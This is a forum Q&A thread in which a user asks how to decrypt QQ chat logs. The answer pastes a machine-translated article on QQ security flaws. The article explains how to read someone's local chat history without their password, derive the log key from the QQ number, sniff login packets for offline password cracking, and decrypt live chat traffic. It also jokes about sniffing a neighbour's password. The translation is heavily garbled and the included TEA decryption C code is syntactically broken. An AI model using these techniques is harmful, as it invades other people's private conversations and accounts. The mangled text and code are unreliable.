QQ chat log parser

Nobuo Miwa
Nobuo Miwa used Ask the Experts™
Hello Experts,

I have to make a program of QQ chat log parser.

I'm looking for QQ chat log parser source code or any documents to program it.
I know that QQ chat log is encrypted with Blowfish but don't know how to decrypt it.
Someone says it encrypted with ID code and some letters for the key.

Please give me any information.
Watch Question

Do more with

Expert Office
EXPERT OFFICE® is a registered trademark of EXPERTS EXCHANGE®
IT Manager
Top Expert 2010
Maybe the info below is what you want.

"QQ chats encryption algorithm Center
And QQ chats encryption algorithm Center

QQ chat history of crack related
And QQ chats encryption algorithm Center
QQ, OICQ, TENCENT developed instant messaging software, is the absolute boss of the domestic Chinese market IM software. Chinese netizens almost
Manpower is at least a QQ number. People than I know, not much introduction.
This article talk about the security problems of the QQ.
The QQ has such phenomenal popularity, security issues, has a contrast disproportionate. Basically, QQ, basically do not have any privacy at all
! In addition, it brought a lot of the supplied security risks for your computer. The people of insight, as I have long not QQ friends.
Local password saved
QQ client will not be agreed to by the user, there is a local user's password after tens of thousands of times MD5 operations. Every time you log in to send network data
Local authentication package before, I believe the familiar QQ friends this point not unfamiliar. This fact gave QQ password brute force attacker machine
Will, as long as the attacker can get the data saved locally. The file once called ewh.db or user.db, do not know whether they
Changed. That due to the MD5 made tens of thousands of times, this crack is not efficient, but the the then low efficiency mentally handicapped password strokes, then in
Line trying to log what not to like?
If you choose the automatic landing, then the password MD5 be saved in oicq2000.cfg, crack speed is greatly increased.
Local chats View loopholes
The typical attack scenarios:'ve got all the local record, is the name of a QQ number folder, do not know the password (or commonly known as the forgotten
Password, remember the majority is known mm) and how to view chat history?
QQ login process is this: 1. Enter a user name password -> 2 local validation through -> 3 user interface (penguin starts flashing) -> 4 hair
Log in to send the package -> 5 received landing packets successfully response -> 6. Successful landing.
Wherein in step 3 of the time, we can see the chat history.
If two fail, the request to re-enter the password; if 5 fails, the exit step 3 the user interface. For the attack without the correct password
Blow it, to keep the 3 state to view local chats, need to fool 2, and to prevent 4 occurred. QQ software encryption (
Packers), so very easy to modify a jump on OK. 4 is even easier, you can pull the network cable or set firewall. Now online
There are many such modifications tutorials and modified client. So will not repeat them.
Local chats encryption method
In fact, the above mentioned is a simple to circumvent local inspection approach. Use of existing client If you prefer, you can write your own check
See the chats tools, because the encryption is so fragile.
First popularize a little common sense: algorithms TEA (Tiny Encryption Algorithm, that micro-encryption algorithm) is a formal cryptography significance
On the encryption algorithm, you can find the original in http://www.ftp.cl.cam.ac.uk/ftp/papers/djw-rmn/djw-rmn-tea.html
Of its introduction. QQ encryption, including local file encryption and remote packet encryption, the main use of this algorithm. Worth noting
Is the original author using 32 operation (even if it is 32, this algorithm is also proved to be known plaintext attack), however TENCENT
Will be reduced to 16. Save half time, but security is a serious decline. To revisit later algorithm common sense, as long as we know that the algorithm is public
Open the can. (Nonsense, do not open and there would be no so more than open source QQ, such as lumaQQ).
QQ local historical data, including chat history and some of the logs, encrypted with a key the local Msg.db or MsgEx.db, but this
A key QQ number MD5 encryption in a local file, in other words, know the QQ number can decrypt these files, QQ number
What code is it? Is where the name of the directory!
Of course, if you enable the local message encryption, the situation is slightly better then a little bit, depending on your local encrypted password strength. But how
Fewer people would go to set this up?
, Trojan flood Windows of HOOK
I think it is a problem that we are most concerned about the QQ password security. Steal QQ passwords filled with a variety of articles or tools on the network, in fact,
The vast majority of more and more difficult to use, some of the so-called steal passwords tool itself is even Trojan to steal your password. These tools are the main
To principle is linked to the child, to determine the name of the current window, keyboard, sent back in some way. In fact, planted Trojan itself has is the case and can not
Demand. Coupled with each other a slight safety awareness, there is a decent point firewall, these tools difficult to succeed.
QQ virus one class of another notorious, commonly known as the QQ tail, many take advantage of this principle, the Find window to send a message.
To solve these problems, TENCENT company has done a lot of work, such as the name of the window is empty, actually see the name of the window is painted.
Such as soft keyboard, such as password protection, but unfortunately too good.
Landing packets were eavesdropping, the password may be offline brute force
This is a very serious problem, and can lead to the password is lost. And said more serious than the previous one. In fact, the attacker no longer needs to be filled wood
Horse, he had to do with the Sniffer can.
Casual analysis the QQ program or look at the open source QQ program, we know that ordinary packet negotiated key, but the QQ login
Lu request packet is not negotiated key, a temporary key is written before the data segment, which means that the data packet can easily
Decrypted. This data package contains what? It contains QQ passwords MD5 or MD5 encryption empty string section of 16 words
Section data! Encryption Algorithm TEA, most terrible, after TENCENT algorithm mode packaging, if using an irrelevant dense
Key to try to decrypt this binary data, decryption function returns an error! Instead of decryption for some useless data and return the correct! This silly
The melon logic brute-force attack to create a great convenience. The actual attacker does not need to go to the exhaustive 128-bit key, his guess as long as possible close
Code, do MD5 operations to the secondary after taste can be used to try to decrypt the 16-byte data.
In short, if your password is simple enough, or into the dictionary, then as long as the malicious attacker with a sniffers or open a QQ agent
, Will be able to know your password, this exhaustive, as long as the local operator can, but the speed is very fast. About 10 ^ 6 to 10 ^ 8 times / sec. This speed
Means that all eight of the following digital, six letters, simple alphanumeric combinations password are useless. As a countermeasure, suggest that in general
Users to use a strong enough password and do not use any QQ agent.
Six working key, real-time decryption QQ data
The QQ chat data encryption negotiate keys for working key, this is good. However, it turned out to be passed with a symmetric algorithm key consultation! ?
QQ working key server randomly generated and send back (perhaps not random? Can predict? But I did not get the QQ server source code, I do not know
Road), QQ online, the key will have the same, if not online for some time, this work key is updated. So every two
Times landing, if the interval of a certain period of time, about ten minutes, the key is different. So that once and for all break key is unrealistic
's. With QQ password MD5, then the attacker can decrypt QQ landing acknowledgment packet, even after decryption can see the work of secret
Key is 16 bytes combination of uppercase and lowercase letters plus numbers. After all the data of the client to the server will be key to decrypt this work entirely. As
If you need point-to-point chat, and then the desired key is sent using the same algorithm and key encryption. In short, after all the QQ data can be considered to be
If your password was stolen or cracked, the attacker is likely not notice you do not change your password, because he knows you have a password-protected, but
Do not think your QQ number is not lost, may attacker watching you chat blase. He can be on-line at any time to kick you down
Help you chat.
Too many complicated release
QQ client version too, various language release regardless the various reign Edition, XP version, beta version, the official release, dubbed colors
Name, dazzling, the key is that they are easy to use. In fact, the C / S structure of a successful network products should not have too many
Version of the client, not only difficult to maintain, increases server overhead, but also provides an opportunity to someone else's version. There are many popular non-official
QQ client version released by what Shanhuchongban, free advertising, display IP version ... have become very popular, and a fool will want, which will inevitably
Steal password version prank version, leaving the back door version in which fish. The QQ on own client packers no problem, it is not for the process of inspection
Investigation and file integrity check daemon. So Taitailielie, how worthy of so much love to the letter of loyal users?
Eight places, does not make any encryption processing module
Perhaps due to too large amount of data, voice and video chat are not encrypted, is expressly dissemination, anyone can watch and listen to online. If
You want to be landed with WEB www.qq.com password will be issued as expressly go.
Nine, chaos Tim plug-chaos-plus-function
Direct control is called to prepare the built-in IE browser, IE completely inherited various functions, as well as vulnerability. We all know that the IE vulnerability research ten
Points behind, then QQ along with it is very dangerous.
Online service QQ Show, Q coins, cellphone, etc., often every launch, and incidentally a bunch of loopholes. A lot of research, this need
Online research, risk, and how I did not worked. Who experience tells me ah.
Custom avatar loophole: It is said that the functions of QQ custom avatar came off a loophole, leading to arbitrary code execution, although I did not practice, but
Wanted might not false.
Can imagine, the more, the greater potential danger! In fact, this is a well-known principle of security software development. Therefore suggest that
As little as possible to play the trial version of the new features, stable old version in fact sometimes do more good than harm.
10, the same authentication method other network services and products
HTTP service, "Triumph game, QQ games hall, etc., can be used the QQ number plus the same password. May be convenient for the user, but in
Security is taboo. The overall safety of the drops wherein the minimum. Triumph and games hall is the client's user name and password
Encrypted with QQ. HTTP but expressly ah.
Talk about some of the following scene.
For example:
First, funny, I actually can http://service.qq.com query to whether any QQ number to apply password protection, then look up
Mm, right next door.
Then enlighten them with reason to love moving mm you go to apply for a password-protected. At the same time open the sniffer.
Hey, apply password protection turned WEB enter a password! You know what? Apply password protection may be lost password process Oh
The way, also incidentally a question and answer it!
Another example:
I network management, has been your password, modify your password, you do not have password protection, then you can go to the complainant to a CGI
Called complaint http://service.qq.com/cgi-bin/TellError .
Then, I know your password once, real information, another QQ number ...... really a bumper crop. What you call a complaint? Well
Play it very hard, a social engineering attack is beyond the scope of this.
For example, you have a password-protected, well then you retrieve process or WEB landing. Say, the number of e-mail and can withstand
sniffer such simple tools? I will not say more.

Here we come to appreciate the QQ decryption code.
void decrypt_qword (unsigned long * in, unsigned long * key, unsigned long * out)
an unsigned long code [4];
register unsigned long i = 16, J = 0xe3779B90, m, n;
m = swapu32 (in [0]);
, n = swapu32 (in [1]);
code [0] = swapu32 (key [0]); code [1] = swapu32 (key [1]);
code [2] = swapu32 (key [2]); code [3] = swapu32 (key [3] );
while (i -> 0)
n - = ((m >> 5) + Code [3]) ^ ((m << 4) + code [2]) ^ (j + m);
m - = ( (n> 5) + code [1]) ^ ((n << 4) + code [0]) ^ (j + n);
j + = 0x61C88647;
out '[0] = swapu32 (m);
out [1] swapu32 (N);

int decrypt_msg (unsigned char * in, int the inlen, unsigned long * key,
unsigned char * out, unsigned long * outlen)
unsigned char q [8] mkey [8], * q1, * q2, * outp;
register int count, i, j, p;
if (inlen% 8 | | inlen <16) return 0;
decrypt_qword ((unsigned long *) in key, (unsigned long *) q);
j = q [0] &0x7; the
count = inlen - j - 10;
/ / if (* outlen <count | | the count <0) return 0; / /????? * outlen
if (count <0) return 0;
* outlen = count;
Memset (mkey, 0, 8);
Q2 = mkey;
i = 8; p = 1;
q1 = in +8;
j + +;
while (p <= 2) {
if (j <8) {
j + +;
p + +;
} else IF (J == 8) {
Q2 = a;
for (j = 0; J <8; J + +) {
if (i + j> = inlen) return 0;
q [j] ^ The in = q1 [j];
decrypt_qword ((unsigned long *) q, key, (unsigned long *)
i + = 8;
q1 + = 8;
j = 0;
outp = out;
while (count! = 0) {
if (j <8) {
outp [0] = q2 [j] ^ q [j];
outp + +;
count -;
j + +;
} else if (j == 8) {
q2 = Q1-8;
for (j = 0; J <8; j + +) {
if (i + j> = inlen) return 0;
q [j] ^ = q1 [j];
decrypt_qword ((an unsigned long *) q, key (unsigned long *)
i + = 8;
Q1 + = 8;
j = 0;
for (p = 1; p <8; p + +) {
if (j <8) {
if (Q2 [J] ^ q [j])
return 0;
j + +;
} else if (j == 8) {
q2 = q1;
for (j = 0; J <8; j + +) {
if ( i + j> = inlen) return 0;
q [j] ^ = q1 [j];
decrypt_qword ((unsigned long *) q, Key, (unsigned long *)
i + = 8;
Q1 + = 8 ;
j = 0;
return 1;
The algorithm mode briefly summarized as follows:
F (i) = P (i) + C (i-1),
C (i) = E (Fi) + f (i-1)
P is plaintext, C is the cipher text, E is TEA algorithm acting on an 8-byte unit. Each time i is incremented by 1, and acting on an 8-byte packet.
We made two design to see QQ encryption algorithm mode, one introduces random characters for the head padding, so that the basic guarantee for the same
Plaintext and keys can result in a completely different encryption result. The mode design makes decryption function can accurately decrypted discarded this part of the random word.
This design indeed good. Mode in another point do bad, is to use the return value clear that the decryption success.
At least two years ago, in fact, Tsinghua Crack version, pure (Tsing Yi ~ shadow in silence) article reveals this section on behalf of
Code, no longer a secret. My own track to get this stuff, but still reference the Shufeng Tan the Net-OICQ-in
0.8, and Puzzlebird Gaim write QQ plug OpenQ-0.3.1 As for the lumaQQ no saw, want to come will almost right.
In fact I have a guess, 32 TEA reduced to 16, must be extraordinarily dangerous, if the algorithm to crack, you can
Take a look at these reference books.
1) John Kelsey, Bruce Schneier, David Wagner, "Related Cryptanalysis of 3-Way, Biham-DES,
CAST, DES-X, NewDES, RC2, and TEA " 
) Fauzan Mirza, "Block Ciphers And Cryptanalysis

May be limited due to time reasons, technical capacity, described above inevitably biased inadequate or fallacious, or out of date. Welcome to the wing.
doublelee [at.] etang.com
According to the rules, the Acknowledgements. Thank you, teachers, students, leaders, colleagues, Mom and Dad, hey ... Alas, if occasional mm can with Xie
Above Quoted from:
http://info.52z.com/html/24862.html "

Source: http://hi.baidu.com/baiidu/item/1448c53560d8b191b90c03ee
Nobuo MiwaSecurity Engineer


Great thanks !!
Nobuo MiwaSecurity Engineer


I've requested that this question be closed as follows:

Accepted answer: 0 points for NobMiwa's comment #a38717820

for the following reason:

Great solution !
Nobuo MiwaSecurity Engineer


Great solution
Jackie Man IT Manager
Top Expert 2010

Glad to know your feedback.

Do more with

Expert Office
Submit tech questions to Ask the Experts™ at any time to receive solutions, advice, and new ideas from leading industry professionals.

Start 7-Day Free Trial